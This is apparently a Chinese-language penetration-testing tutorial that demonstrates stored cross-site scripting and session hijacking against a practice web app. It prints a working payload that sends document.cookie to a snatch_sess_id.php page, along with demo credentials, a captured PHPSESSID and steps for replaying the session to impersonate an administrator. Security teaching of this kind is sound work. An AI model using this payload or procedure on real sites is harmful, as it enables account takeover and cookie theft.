黑客行为:入侵一个网站
在这个实际的场景中,我们将劫持位于www.techpanda.org(可能需要外网访问)的web应用程序的用户会话。我们将使用跨站点脚本来获取cookie会话id,然后使用它来模拟一个合法的用户会话。
假设攻击者可以访问web应用程序,并且他想劫持使用同一应用程序的其他用户的会话。这种攻击的目标可能是获得对web应用程序的管理访问权,假设攻击者的访问帐户是有限的。
准备开始
打开http://www.techpanda.org/登录邮箱为admin@google.com,密码为Password2010如果你已经成功登录,那么你将跳转到如下页面点击Add New Contact输入以下内容作为first name<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
上面的代码使用了JavaScript,它添加了一个带有onclick事件的超链接。当不知情的用户单击该链接时,事件将检索PHP cookie会话ID并将其连同URL中的会话ID一起发送到snatch_sess_id.php页面
输入如下所示的其余细节点击Save Changes现在,你的仪表板将看起来像下面这样因为跨站点脚本代码存储在数据库中,所以每次有访问权限的用户登录时都会加载它让我们假设管理员登录并单击显示为Dark的超链接我们将获得一个显示在URL中的会话id的窗口注意:脚本可以将值发送到存储PHPSESSID的远程服务器,然后用户重定向回网站,就像什么都没有发生一样。
使用Firefox和Tamper Data插件来模拟会话
下面的流程图显示了完成这个练习必须采取的步骤。
你将需要Firefox web浏览器和Tamper Data插件来完成这部分打开Firefox并安装添加,如下图所示搜索tamper data,然后单击安装,如上所示点击Accept and Install…当安装完成时,单击Restart now如果菜单栏没有显示,请启用它单击tools,然后选择tamper data,如下所示你将看到以下窗口。注意:如果窗户不是空,点击clear按钮点击Start Tamper切换回Firefox web浏览器,输入http://www.techpanda.org/dashboard.php,然后按enter键加载页面你将从tamper data中得到以下弹出框弹出窗口有三个选项。Tamper选项允许你在将HTTP头信息提交给服务器之前修改它。点击它,你将看到以下窗口复制从攻击URL复制的PHP会话ID,并将其粘贴到等号后面。现在你的值应该是这样的PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
点击OK按钮你将再次看到tamper data弹出窗口取消Continue Tampering复选框完成后单击submit按钮,你应该能够看到如下所示的信息注意:我们没有登录,我们使用使用跨站点脚本检索到的PHPSESSID值模拟了一个登录会话
希望通过这篇文章你们能够对网络渗透有一个初步了解。
关注我,阅读更多精彩好文